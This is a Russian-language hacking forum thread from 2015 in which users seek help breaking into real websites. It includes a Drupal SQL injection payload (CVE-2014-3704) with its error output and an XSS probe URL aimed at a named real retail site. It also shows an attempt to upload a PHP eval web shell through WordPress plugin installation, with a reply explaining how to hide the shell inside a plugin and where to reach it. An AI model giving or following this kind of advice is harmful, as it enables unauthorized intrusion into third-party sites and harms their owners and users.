06.02.2015, 18:21
|
|
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
С нами:
7167926
Репутация:
20
|
|
Есть сайт со sqli (старая версия drupal) CVE-2014-3704
Использовал следующие эксплоиты:
http://www.exploit-db.com/exploits/34993/
http://www.exploit-db.com/exploits/34992/
http://www.exploit-db.com/exploits/34984/
Но ни один не сработал, хотя и пишут, что новый пользователь был успешно создан.
Как раскрутить я не знаю.
Sqli при пост запросе:
http://www.site.com/?q=node&destination=node
name[0']=0;&name[0]=asd&pass=asd&test2=test&form_build_id=&form_id=us er_login_block&op=Log%2Bin
output:
Сообщение от None
Warning: mb_strlen() expects parameter 1 to be string, array given in drupal_strlen() (Zeile 478 von /pages/bd/asd/home/htdocs/site/includes/unicode.inc).
Warning: addcslashes() expects parameter 1 to be string, array given in DatabaseConnection->escapeLike() (Zeile 981 von /pages/bd/asd/home/htdocs/site/includes/database/database.inc).
PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'asd' AND status = 1' at line 1: SELECT * FROM {users} WHERE name = :name_0', :name_0 AND status = 1; Array ( [:name_0'] => 0; [:name_0] => asd ) in user_login_authenticate_validate() (Zeile 2148 von /pages/bd/asd/home/htdocs/site/modules/user/user.module).
|
|
|
06.02.2015, 19:18
|
|
Новичок
Регистрация: 29.12.2010
Сообщений: 1
С нами:
8089526
Репутация:
2
|
|
Сообщение от Vip77
Есть сайт со sqli (старая версия drupal) CVE-2014-3704
Использовал следующие эксплоиты:
http://www.exploit-db.com/exploits/34993/
http://www.exploit-db.com/exploits/34992/
http://www.exploit-db.com/exploits/34984/
Но ни один не сработал, хотя и пишут, что новый пользователь был успешно создан.
Как раскрутить я не знаю.
Sqli при пост запросе:
http://www.site.com/?q=node&destination=node
name[0']=0;&name[0]=asd&pass=asd&test2=test&form_build_id=&form_id=us er_login_block&op=Log%2Bin
output:
Ничего сложного, напиши мне по контактам в профиле, объясню.
|
|
|
|
06.02.2015, 23:42
|
|
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
С нами:
7167926
Репутация:
20
|
|
Сообщение от scr1m77
Ничего сложного, напиши мне по контактам в профиле, объясню.
Благодарю за помощь.
|
|
|
|
07.02.2015, 00:05
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
При проверки на XSS сайт на экране "7" (не всплывающая)
Код:
chttp://www.mobilluck.com.ua/info.php?page=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
2. Есть сайт с SQL но нет привилегий, а хэш пароля адимна самописный т.е не расшифруешь.. как в таком случае залить шел. |
|
|
|
07.02.2015, 00:13
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Unknowhacker
2. Есть сайт с SQL но нет привилегий, а хэш пароля адимна самописный т.е не расшифруешь.. как в таком случае залить шел.
а ты сам то как думаешь?
|
|
|
|
07.02.2015, 14:36
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Unknowhacker
При проверки на XSS сайт на экране "7" (не всплывающая)
Код:
chttp://www.mobilluck.com.ua/info.php?page=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
2. Есть сайт с SQL но нет привилегий, а хэш пароля адимна самописный т.е не расшифруешь.. как в таком случае залить шел. возможно WAF.
обход авторизации? маловероятно, но попробуйте. стоит также рассмотреть и другие варианты уязвимостей
|
|
|
|
07.02.2015, 15:35
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Сообщение от UXOR
а ты сам то как думаешь?
Я то думаю, что никак. Решил уточнить
.. faza02, каким образом обойти авторизацию?
|
|
|
|
07.02.2015, 20:01
|
|
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
С нами:
9597253
Репутация:
82
|
|
есть админка вп 4.1 , доступно только установка плагина, шел грузится но не открывается
почему то выдает
Сообщение от None
Удаленный сервер или файл не найден
грузу обычный пхп с евалом и echo , echo выводится, а при запросе /uploads/lit.php?e=phpinfo(); опять пишет сервер или файл не найдет.
что в таком случае можно сделать?
также рут в бд, но пути не раскрываются |
|
|
|
07.02.2015, 20:22
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Сообщение от mazaxaka
есть админка вп 4.1 , доступно только установка плагина, шел грузится но не открывается
почему то выдает
грузу обычный пхп с евалом и echo , echo выводится, а при запросе /uploads/lit.php?e=phpinfo(); опять пишет сервер или файл не найдет.
что в таком случае можно сделать?
также рут в бд, но пути не раскрываются
Ну, вообще-то если ты загружаешь плагин - то шелл будет не в папке uploads. Скачай готовый плагин, замени файл на шелл, загрузи и иди по примерно такому пути: site.com/wp-content/plugins/название_плагина/файл_с_шеллом.php.
|
|
|
|
07.02.2015, 21:40
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Unknowhacker
Я то думаю, что никак. Решил уточнить
.. faza02, каким образом обойти авторизацию?
csrf например
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
